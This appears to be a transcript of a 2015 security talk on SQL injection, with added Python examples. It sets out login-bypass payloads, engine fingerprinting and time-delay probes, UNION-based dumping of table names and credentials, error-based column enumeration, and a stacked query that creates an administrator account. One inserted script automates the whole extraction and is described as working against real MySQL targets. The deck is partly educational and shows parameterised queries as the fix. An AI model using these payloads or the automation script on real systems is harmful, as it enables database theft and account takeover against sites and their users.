Post on 08-Jul-2015
How Did I Steal Your Database
Mostafa Siraj
Application Security Expert
DISCLAIMER
Hacking websites is ILLEGAL
This presentation is meant for educational purposes ONLY
Only use this stuff on YOUR website and YOUR account
Nearly all applications rely on a Datastore
What is a Database
• A collection of tables (Users, Orders, Countries, etc.)
• Each table is a collection of columns and rows, e.g. a Users table:

Username     Password     First_Name  Last_Name  Email                    IsAdmin
Elprince     Elprince123  Ahmed       ElMasry    elprince123@example.com  Yes
ElnegmTamer  Password123  Tamer       Tamer      Tamer123@example.com     No
…            …            …           …          …                        …
What is SQL
• A query language that allows interacting with the database
• SQL can
– Retrieve data from the database
– Insert new records in the database
– Delete records from the database
– Update records in the database
SQL Queries
• To get all data about the user with Username elprince:
SELECT Username, Password, First_Name, Last_Name, Email
FROM Users
WHERE Username='elprince'
• Gives a result:
Elprince Elprince123 Ahmed ElMasry elprince123@example.com
FACT
• Amongst Codd's rules for a Relational Database:
– Metadata must be stored in the database just as regular data is
• This is why the schema itself (table and column names) can be read with ordinary SELECT statements, which the attack below relies on
SQL Injection
• is a technique where an attacker creates or alters existing SQL commands to
– Expose hidden data (e.g. steal all the records from the tables)
– Overwrite data (e.g. the administrator's password)
– Execute dangerous system-level commands on the database host
SQL Injection Login Example
SELECT * FROM Users WHERE Username='username' AND Password='password'
• If the user entered Elprince, Elprince123 the query will be
SELECT * FROM Users WHERE Username='Elprince' AND Password='Elprince123'
SQL Injection Example (cont.)
• Suppose the user entered ' OR 1=1--, 123 the query will be
SELECT * FROM Users WHERE
Username='' OR 1=1--' AND Password='123'
• -- comments out everything after it (in MySQL the two dashes must be followed by a space, or use # instead), so the query becomes
SELECT * FROM Users WHERE
Username='' OR 1=1
• This matches every row; the application typically logs in whichever row comes back first
This is not enough
• You can enhance the injection to log in with the administrator account, which is often the first record in the table
• Enter ' OR 1=1 ORDER BY 1--, abc and the query will be
SELECT * FROM Users WHERE
Username='' OR 1=1 ORDER BY 1--' AND Password='abc'
• ORDER BY 1 sorts the matching rows on the first column (normally the ID), so the first row returned, the one the application logs in, is the administrator
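The login bypass above, run against an in-memory SQLite table so the effect of the two payloads can be seen side by side. This is an added example, not code from the deck: the Users table, the two accounts and the assumption that the application logs in the first row returned are all constructed here. The parameterised version shows the fix.

```python
import sqlite3

# Constructed sample accounts (not from the original deck). The non-admin row
# is inserted first so that the order of returned rows is visible.
SAMPLE_USERS = [
    ("Tamer", "Password123", 0),
    ("Elprince", "Elprince123", 1),
]


def make_db():
    """In-memory SQLite stand-in for the application's Users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Username TEXT, Password TEXT, IsAdmin INTEGER)")
    conn.executemany("INSERT INTO Users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_login(conn, username, password):
    """Builds the query by string concatenation, as on the slides. Like many
    login handlers it treats the first row returned as the logged-in user.
    Returns (Username, is_admin) or None when no row matches."""
    sql = ("SELECT Username, IsAdmin FROM Users WHERE Username='" + username
           + "' AND Password='" + password + "'")
    row = conn.execute(sql).fetchone()
    return (row[0], bool(row[1])) if row else None


def safe_login(conn, username, password):
    """Same lookup with a parameterised query: the driver passes the values
    separately from the SQL text, so quotes and -- in the input stay data."""
    sql = "SELECT Username, IsAdmin FROM Users WHERE Username=? AND Password=?"
    row = conn.execute(sql, (username, password)).fetchone()
    return (row[0], bool(row[1])) if row else None


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_login(db, "Elprince", "Elprince123"))      # ('Elprince', True)
    # ' OR 1=1-- matches every row; the first row in table order wins
    print(vulnerable_login(db, "' OR 1=1--", "123"))             # ('Tamer', False)
    # ORDER BY 1 sorts on the first selected column (Username here), so the
    # first row is now the administrator
    print(vulnerable_login(db, "' OR 1=1 ORDER BY 1--", "abc"))  # ('Elprince', True)
    print(safe_login(db, "' OR 1=1--", "123"))                   # None
```

SQLite accepts the `--` comment as written; on MySQL the same payloads need a space after the dashes (or `#`).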
Finding SQL Injection Bugs
• Submit a single quotation mark and observe the result
• Submit two single quotation marks and observe the result (an escaped quote should behave like normal input)
• For multistage processes, complete all the stages before observing the results
• For search fields try using the wildcard character %
• For numeric data, if the original value was 2 try submitting
1+1 or 3-1
• If successful try using SQL-specific functions, e.g.
67-ASCII('A') [ASCII('A')=65]
• If single quotes are filtered try
51-ASCII(1) [note ASCII(1)=49, as the number 1 is converted to the string '1']
Identify the database engine
• The error messages will let us know the DB engine
• We can guess the DB based on the OS or web server (e.g. LAMP: Linux+Apache+MySQL+PHP)
• Use engine-specific characters or commands, e.g. string concatenation, injected into a quoted value:
Oracle: '||'FOO
MS SQL Server: '+'FOO
MySQL: ' 'FOO [note the space between the two quotes]
• The probe that returns the normal result instead of an error tells you the engine
Identify user privileges
• ' and 1 in (SELECT user)-- [SQL Server: the conversion error echoes the current user name]
• '; IF user='admin' WAITFOR DELAY '0:0:10'-- [SQL Server: a 10-second delay confirms the guess without any error message]
Injection in Search Fields
[screenshot: entering normal input and the search results]
[screenshot: trying a single quote; the page returns a database error]
• The error message already names the engine, but suppose I still don't know it. Is it MS SQL Server?
Note: string concatenation in MS SQL Server is +
[screenshot] I get an error, so it's not MS SQL Server
• Is it Oracle?
Note: string concatenation in Oracle is ||
[screenshot] A different error, so it's not Oracle either
• Is it MySQL?
Note: string concatenation in MySQL is a blank space between the two strings
[screenshot] It works: the engine is MySQL
• The query in the backend is something like this:
SELECT …,…,…,…,…
FROM ….
WHERE ….=…. AND ….!=….. OR ….. OR ….LIKE….
• A possible location for my input is one of the quoted values in the WHERE clause
The Strategy
1. Get number of items after the SELECT statement
SELECT …,…,…,…,…
FROM ….
WHERE ….=…. AND ….!=….. OR …..>……
How many items are here
The Strategy
2. Identify the location of the STRINGS in the SELECT Statement
SELECT …,…,…,…,…
FROM ….
WHERE ….=…. AND ….!=….. OR …..>……
Which of those are strings
The Strategy
3. Get the Structure of the database
SELECT …,…,…,…,…
FROM ….
WHERE …. UNION
SELECT ….,TableNames,….,….,…
FROM DatabaseStructure --=…. AND ….!=….. OR …..>……
The Strategy
4. Get the data from the database
SELECT …,…,…,…,…
FROM ….
WHERE …. UNION
SELECT ….,Usernames,….,….,…
FROM Users --=…. AND ….!=….. OR …..>……
The Strategy
1. Get number of items after the SELECT statement
2. Identify the location of the STRINGS in the SELECT Statement
3. Get the Structure of the database
4. Get the data from the database
1. Get number of items after the SELECT statement
[screenshot] First guess: error
[screenshot] Try another number: a result comes back, but why are there fewer results?
[screenshot] Try another number: error, so it's not 8
[screenshot] Let's try 7: result
• So how many columns do we have in the SELECT statement? 7
2. Identify the location of the STRINGS in the SELECT Statement
1234') UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Result
Get the Strings and the locations
1234') UNION SELECT NULL,'ABC','DEF','IJK','LMN',NULL,NULL#
Result
3. Get the Structure of the database
1234') UNION SELECT NULL,NULL,NULL,table_name,NULL,NULL,NULL FROM information_schema.tables#
Result
Next Queries
1234') UNION SELECT NULL,NULL,NULL,column_name,NULL,NULL,NULL FROM information_schema.columns WHERE table_name='USERS'#
1234') UNION SELECT NULL,NULL,NULL,username,password,NULL,NULL FROM users WHERE id<100#
…….
Continue till you get all the tables
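The four-step UNION strategy above, automated against an in-memory SQLite database. This is an added example and not the deck's own code: the products and users tables, the search page that concatenates its input inside ('...') and renders only three of its seven columns, and the payload shapes are all constructed here. Two substitutions are needed because the deck's target was MySQL: SQLite has no # comment, so the payloads end in --, and it keeps table names in sqlite_master rather than information_schema.tables. Step 2 is done the way the slides do it, by injecting markers and seeing which ones reach the page.

```python
import sqlite3


# Constructed sample schema and rows (not from the original deck). The search
# page queries 'products'; 'users' is the table we want to reach via UNION.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, description TEXT,
                               category TEXT, price REAL, stock INTEGER, sku TEXT);
        INSERT INTO products VALUES (1, 'Laptop', 'Thin and light', 'computers', 999.0, 5, 'LP-1');
        INSERT INTO products VALUES (2, 'Mouse', 'Wireless', 'accessories', 19.5, 50, 'MS-2');
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'Elprince', 'Elprince123');
        INSERT INTO users VALUES (2, 'Tamer', 'Password123');
    """)
    return conn


def search(conn, term):
    """The vulnerable search page. The term is concatenated inside ('...'),
    which is why every payload starts with ') to break out; the page renders
    only name, description and category (SELECT positions 2, 3 and 4)."""
    sql = ("SELECT id, name, description, category, price, stock, sku "
           "FROM products WHERE (category = '" + term + "')")
    return [(r[1], r[2], r[3]) for r in conn.execute(sql).fetchall()]


def union_payload(select_list, source=""):
    """Builds  x') UNION SELECT <cols> [FROM <source>] --  ; the trailing --
    comments out the original ') (the deck's MySQL target used # instead)."""
    tail = (" FROM " + source) if source else ""
    return "x') UNION SELECT " + ", ".join(select_list) + tail + " -- "


def column_count(conn, max_cols=20):
    """Step 1: grow the number of NULLs until the engine stops rejecting the
    UNION for a column-count mismatch."""
    for n in range(1, max_cols + 1):
        try:
            search(conn, union_payload(["NULL"] * n))
            return n
        except sqlite3.OperationalError:
            continue
    return None


def reflected_positions(conn, n):
    """Step 2: put a distinct marker in every position and see which markers
    reach the page. Returns {SELECT position: index in the rendered row}."""
    markers = ["M%d" % i for i in range(1, n + 1)]
    rendered = search(conn, union_payload(["'%s'" % m for m in markers]))
    found = {}
    for row in rendered:
        for j, cell in enumerate(row):
            if cell in markers:
                found[markers.index(cell) + 1] = j
    return found


def read_through(conn, n, reflected, expr, source):
    """Steps 3 and 4 share one shape: place an expression in the first
    reflected position, NULL elsewhere, and collect what the page shows."""
    pos = min(reflected)
    cols = ["NULL"] * n
    cols[pos - 1] = expr
    rendered = search(conn, union_payload(cols, source))
    return sorted(row[reflected[pos]] for row in rendered)


def steal_database(conn):
    """Runs the four steps end to end. Two columns are pulled through a single
    reflected position by concatenating them, the same trick the deck uses
    for engine fingerprinting."""
    n = column_count(conn)
    reflected = reflected_positions(conn, n)
    tables = read_through(conn, n, reflected, "name", "sqlite_master WHERE type='table'")
    creds = read_through(conn, n, reflected, "username || ':' || password", "users")
    return {"columns": n, "reflected": sorted(reflected), "tables": tables, "users": creds}


if __name__ == "__main__":
    for key, value in steal_database(make_db()).items():
        print(key, value)
```

The same driver works against a real MySQL target once `union_payload` ends in `#` and the catalogue queries name `information_schema.tables` and `information_schema.columns`; on engines that type-check UNION columns the marker probe in step 2 also needs NULL in the non-string positions, which is why the slides start from all NULLs.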
Injection with errors
[screenshot] A single quote gives me an error
• Getting the version:
' and 1 in (SELECT @@version)--
[screenshot] The conversion error echoes the version string
• Getting column names
[screenshot] I get this error
• Getting the next column name:
' group by login.firstname having 1=1--
[screenshot] I get this error
• Again:
' group by login.firstname, login.surname having 1=1--
[screenshot] The error reveals a new column name
• Again:
' group by login.firstname, login.surname, login.username having 1=1--
[screenshot] New column name
• Continue, adding each revealed column to the GROUP BY, until the query stops erroring
• Why it works (SQL Server): a SELECT with GROUP BY fails on the first selected column that is neither grouped nor aggregated, and the error message names that column
• After getting all of the columns I found a field called IsAdmin, and that's my goal
• Submitting the following stacked query creates an administrator account in the application
'; INSERT INTO Login
(username,pwd,IsAdmin,……)
VALUES
('Administrator','******',TRUE,…..)
• Note: on SQL Server a bit column such as IsAdmin takes 1 rather than TRUE
Not all injections generate errors (blind injection), which is where automation helps
DEMO: SQLMap
You Were a GREAT Audience
Thank You
@mostafasiraj
Mostafa Siraj